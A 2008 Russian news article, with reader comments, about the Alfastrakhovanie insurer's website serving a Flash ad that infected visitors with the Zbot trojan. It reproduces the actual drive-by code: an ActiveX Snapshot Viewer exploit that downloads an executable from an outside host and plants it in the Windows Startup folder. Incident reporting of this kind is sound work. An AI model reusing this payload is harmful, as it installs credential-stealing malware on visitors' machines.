Рекламный эротический ролик Альфастрахования заражал пользователей трояном

image

ИТ-департамент «Альфастрахования» был извещен о проблеме с главной страницей вечером 25 ноября, днем 26-го flash-ролик еще запускался, и антивирусные программы детектировали в нем троян.

Во время кампании по увеличению трафика, главная страница сайта компании «Альфастрахование» заражала посетителей трояном через эротико-рекламный мультфильм.

Акция по привлечению посетителей на сайт «Альфастрахования» была запущена 25 ноября.  На главной странице сайта была установлена закладка - при многократном (5-8 раз) нажатии на номер телефона компании запускался swf-мультфильм эротического содержания, сопровожденный призывом воспользоваться страховыми услугами компании.

Информация об этом распространялась по Сети методом вирусного маркетинга. По данным Rambler Top100 за вчерашний день главную страницу сайта посетили 142 480 раз, что сопоставимо с недельной нормой посещаемости ресурса.

Вскоре после старта рекламной кампании обнаружилось, что в код ролика внедрена троянская программа Trojan-Spy.Win32.Zbot.gkj. По информации «Лаборатории Касперского», она была внесена в антивирусную базу 16 ноября 2008 г., и антивирусные продукты компании ее детектировали, не рекомендуя сайт к посещению. Учитывая «аккуратность» расположения трояна во flash-коде, в «Касперском» не исключают, что вредоносная программа была подсажена на сайт вручную. Вирус грузился внутри ролика следующим образом:

<pre>
HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>
<script>
var arbitrary_file = «google-analyze.com/tracker/load.php»;
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=«pdf.php» type=«application/pdf» width=100 height=100></embed>
</pre>


В «Лаборатории Касперского» не располагают информацией о функциональности этого трояна, но семейству Zbot, к которому он относится, свойственно, после инсталляции себя в систему, воровать пользовательские пароли, перехватывать данные, вводимые в формы браузеров и контролировать адреса банков и платежных систем. Таким образом происходит кража аккаунтов. Трояны Zbot способны перехватывать нажатие кнопки мыши и делаеть в этот момент скриншот экрана.

Интересно, что, хотя по информации «Лаборатории Касперского», ИТ-департамент «Альфастрахования» был извещен о проблеме с главной страницей вечером 25 ноября, днем 26-го flash-ролик еще запускался, и антивирусные программы детектировали в нем троян.

или введите имя

CAPTCHA
Страницы: 1  2  3  
антипенгвин
26-11-2008 18:40:04
Друзья, помогите избавиться от этого вируса, я смотрел этот ролик, а теперь комп тормозит, а мне срочно надо в Ворде реферат писать. Помогите, горю!
0 |
26-11-2008 18:48:33
Да ладно не ссы! У тебя ж самая безопастная ось, тебе все должно быть пох!
0 |
/etc
26-11-2008 23:03:23
к венерологу!!! срочно!
0 |
zyk
27-11-2008 05:11:47
удали flash отключи инет похоже у тебя пароли воруют
0 |
26-11-2008 19:40:06
а как его посмотреть то? Через FireFox не работает???
0 |
26-11-2008 19:58:07
Тоже хотел, уже не работает.
0 |
zyk
27-11-2008 05:14:13
невиданная жадность! жертвы быдлорекламного маркетинга сами идут и заражают себя вирусом гыгы
0 |
КАК?
27-11-2008 05:55:19
а как во флеш файл (swf) встроили exe? разве это возможно?
0 |
СаньОК
27-11-2008 07:53:55
Еще как) Более того, можно в flv специально сформированном встроить выполняемый код, который запустится в 9 версии (сейчас самая распространенная)
0 |
urix
28-11-2008 12:54:34
Не во флеш встроили, а сделали загрузку с хоста исполняемого файла, который копируется на винт пользователя
0 |
27-11-2008 08:02:23
А Avast промолчал. Вечером проверяться буду...
0 |
Страницы: 1  2  3